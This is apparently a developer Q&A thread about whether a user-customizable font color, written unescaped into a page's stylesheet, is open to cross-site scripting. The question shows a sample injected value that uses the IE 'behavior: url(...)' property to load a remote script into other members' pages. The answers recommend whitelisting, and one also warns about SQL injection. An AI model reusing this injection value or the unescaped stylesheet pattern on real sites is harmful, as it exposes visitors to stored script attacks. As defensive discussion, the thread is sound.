# User customizable colors - is it open to script attacks? How to prevent?

Tags: css, xss

I have a form like this for logged in users to my site:

```
<form>
<input name="fontColor"><input type="submit">
</form>
```

This allows the user to customize their own page with a font color (their page is visible to other logged in users as well). The way this font-color gets put into the page is through a dynamic style sheet in the head of the page that is constructed like this:

```
body { color: <fontColor>; }
```

Suppose the user entered this for the fontColor:

`default; behavior: url(http://www.myscript.com/script.htc)`

Then the CSS would result in

`body {color: default;behavior: url(http://www.myscript.com/script.htc)}`

This means a users "member page" would insert the script.htc on the page and thus other members visiting this member's page will have that script executed (thus resulting in an attack on the other visitor).

To prevent against this, the server will ignore characters: `;{}` that are entered into the "fontColor" field.

In this case the resuling CSS would be invalid and just won't work.

`body {color: defaultbehavior: url(http://www.myscript.com/script.htc)}`

Essentially my question boils down to these:

1. Is there still a way to insert a script without using `{};` characters?
2. Supposing `{};` were allowed, are there other ways (other than behavior style that works in IE) unwanted scripts can be inserted into CSS?

I know the best solution here would be to validate the fontColor so that the user does not have as much freedom with the color, but for academic purposes I still want to know as much as I can about what could happen.

Comment: What technologies are you using to get the value from the input to the stylesheet?

Comment: It could be anything because the question is not really what code is there to fix it, but in what ways would this hypothetical situation be open to attack... But I'm using AMP (apache,Mysql,PHP)

Comment: Yes, it is possible. See [here](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet). That said, CSS properties are fairly easy to whitelist, so you don't have to throw away the functionality. Just don't trust the user's input.

Answer (score 2, accepted):

XSS attacks are really only limited by the imagination of the attacker, so I would make sure to have a strict whitelist of allowed rules/patterns.  Just because the CSS rule is invalid doesn't necessarily mean that all browsers will not attempt to include the other file via `url` even outside of a `behavior` or `background-image` rule where it would be valid.  Another possible vector is `expression`, even though it's not well supported.

I certainly won't be able to come up with a complete list here, but the important thing to recognize about XSS is that there are no known limitations for any vectors, and vulnerabilities can be exploited without you noticing.  It's much better to work from what you want to allow rather than what you want to deny.

Answer (score 1):

Another thing to consider, aside from attacks in the CSS, is a SQL injection attack.  Since I imagine you're storing the style data in a database, you need to worry about what is in that data.  Using [mysqli::real_escape_string](http://www.php.net/manual/en/mysqli.real-escape-string.php) is a good start to preparing your data for storage.

In this case, since you are strictly interested in color data, a color picker could be used to not only make your interface easy to use and also limit the type of data you expect to receive.  An attacker can easily modify the page to let them submit whatever they want, but it's much simpler to filter strictly for hex values when that's what your tool generates.